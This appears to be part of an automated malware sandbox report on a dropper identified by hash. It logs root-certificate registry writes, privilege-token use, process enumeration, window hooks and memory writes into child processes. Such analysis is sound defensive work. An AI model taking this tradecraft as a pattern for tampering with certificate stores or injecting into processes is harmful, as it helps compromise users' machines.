Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703091400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000000300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	swkptQGCL_6GOXNqiLUpRvXT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181180b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded309000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	swkptQGCL_6GOXNqiLUpRvXT.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

conhost.exe

pid process

2568 conhost.exe

pid	process
2568	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeGraphics.exejfiag3g_gg.exe

pid	process
1668	pub2.exe
1668	pub2.exe
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1376	Graphics.exe
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
2000	jfiag3g_gg.exe
1420
1420

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1420
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1668 pub2.exe

pid	process
1420

pid	process
460

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exemd9_1sjm.exeSoCleanInst.exetaskkill.exeGraphics.execsrss.exetasklist.exezFdDMSbIeAhDTUwR9NKYycuo.exe7z.exetasklist.exeAvYsoeUKHZHOE7oO3qZJF5Rg.execonhost.exepowershell.exepowershell.exeschtasks.exepowershell.exeschtasks.exe7z.exe7z.exe

description	pid	process
Token: SeCreateTokenPrivilege	1208	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1208	Install.exe
Token: SeLockMemoryPrivilege	1208	Install.exe
Token: SeIncreaseQuotaPrivilege	1208	Install.exe
Token: SeMachineAccountPrivilege	1208	Install.exe
Token: SeTcbPrivilege	1208	Install.exe
Token: SeSecurityPrivilege	1208	Install.exe
Token: SeTakeOwnershipPrivilege	1208	Install.exe
Token: SeLoadDriverPrivilege	1208	Install.exe
Token: SeSystemProfilePrivilege	1208	Install.exe
Token: SeSystemtimePrivilege	1208	Install.exe
Token: SeProfSingleProcessPrivilege	1208	Install.exe
Token: SeIncBasePriorityPrivilege	1208	Install.exe
Token: SeCreatePagefilePrivilege	1208	Install.exe
Token: SeCreatePermanentPrivilege	1208	Install.exe
Token: SeBackupPrivilege	1208	Install.exe
Token: SeRestorePrivilege	1208	Install.exe
Token: SeShutdownPrivilege	1208	Install.exe
Token: SeDebugPrivilege	1208	Install.exe
Token: SeAuditPrivilege	1208	Install.exe
Token: SeSystemEnvironmentPrivilege	1208	Install.exe
Token: SeChangeNotifyPrivilege	1208	Install.exe
Token: SeRemoteShutdownPrivilege	1208	Install.exe
Token: SeUndockPrivilege	1208	Install.exe
Token: SeSyncAgentPrivilege	1208	Install.exe
Token: SeEnableDelegationPrivilege	1208	Install.exe
Token: SeManageVolumePrivilege	1208	Install.exe
Token: SeImpersonatePrivilege	1208	Install.exe
Token: SeCreateGlobalPrivilege	1208	Install.exe
Token: 31	1208	Install.exe
Token: 32	1208	Install.exe
Token: 33	1208	Install.exe
Token: 34	1208	Install.exe
Token: 35	1208	Install.exe
Token: SeManageVolumePrivilege	468	md9_1sjm.exe
Token: SeDebugPrivilege	1116	SoCleanInst.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	1376	Graphics.exe
Token: SeImpersonatePrivilege	1376	Graphics.exe
Token: SeSystemEnvironmentPrivilege	860	csrss.exe
Token: SeDebugPrivilege	2648	tasklist.exe
Token: SeDebugPrivilege	2128	zFdDMSbIeAhDTUwR9NKYycuo.exe
Token: SeDebugPrivilege	2876	7z.exe
Token: SeDebugPrivilege	2988	tasklist.exe
Token: SeShutdownPrivilege	1420
Token: SeDebugPrivilege	2136	AvYsoeUKHZHOE7oO3qZJF5Rg.exe
Token: SeRestorePrivilege	2056	conhost.exe
Token: 35	2056	conhost.exe
Token: SeSecurityPrivilege	2056	conhost.exe
Token: SeSecurityPrivilege	2056	conhost.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2708	schtasks.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeRestorePrivilege	2692	schtasks.exe
Token: 35	2692	schtasks.exe
Token: SeSecurityPrivilege	2692	schtasks.exe
Token: SeSecurityPrivilege	2692	schtasks.exe
Token: SeRestorePrivilege	2700	7z.exe
Token: 35	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeRestorePrivilege	2196	7z.exe
Token: 35	2196	7z.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

Accostarmi.exe.pif

pid process

2064 Accostarmi.exe.pif
1420
1420
1420
1420
2064 Accostarmi.exe.pif
2064 Accostarmi.exe.pif
2064 Accostarmi.exe.pif
1420
1420
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Accostarmi.exe.pif

pid process

2064 Accostarmi.exe.pif
2064 Accostarmi.exe.pif
2064 Accostarmi.exe.pif
2064 Accostarmi.exe.pif
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

lXYcLBZvdNhHR1z4XaSWnxTA.exe

pid process

2208 lXYcLBZvdNhHR1z4XaSWnxTA.exe

pid	process
2064	Accostarmi.exe.pif
1420
1420
1420
1420
2064	Accostarmi.exe.pif
2064	Accostarmi.exe.pif
2064	Accostarmi.exe.pif
1420
1420

pid	process
2064	Accostarmi.exe.pif
2064	Accostarmi.exe.pif
2064	Accostarmi.exe.pif
2064	Accostarmi.exe.pif

pid	process
2208	lXYcLBZvdNhHR1z4XaSWnxTA.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exeFiles.exeInstall.execmd.exeGraphics.execmd.exe

description	pid	process	target process
PID 1808 wrote to memory of 1116	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	SoCleanInst.exe
PID 1808 wrote to memory of 1116	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	SoCleanInst.exe
PID 1808 wrote to memory of 1116	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	SoCleanInst.exe
PID 1808 wrote to memory of 1116	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	SoCleanInst.exe
PID 1808 wrote to memory of 468	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	md9_1sjm.exe
PID 1808 wrote to memory of 468	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	md9_1sjm.exe
PID 1808 wrote to memory of 468	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	md9_1sjm.exe
PID 1808 wrote to memory of 468	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	md9_1sjm.exe
PID 1808 wrote to memory of 1652	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Folder.exe
PID 1808 wrote to memory of 1652	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Folder.exe
PID 1808 wrote to memory of 1652	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Folder.exe
PID 1808 wrote to memory of 1652	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Folder.exe
PID 1808 wrote to memory of 1376	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Graphics.exe
PID 1808 wrote to memory of 1376	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Graphics.exe
PID 1808 wrote to memory of 1376	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Graphics.exe
PID 1808 wrote to memory of 1376	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Graphics.exe
PID 1808 wrote to memory of 432	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Updbdate.exe
PID 1808 wrote to memory of 432	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Updbdate.exe
PID 1808 wrote to memory of 432	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Updbdate.exe
PID 1808 wrote to memory of 432	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Updbdate.exe
PID 1808 wrote to memory of 1208	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 1808 wrote to memory of 1208	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
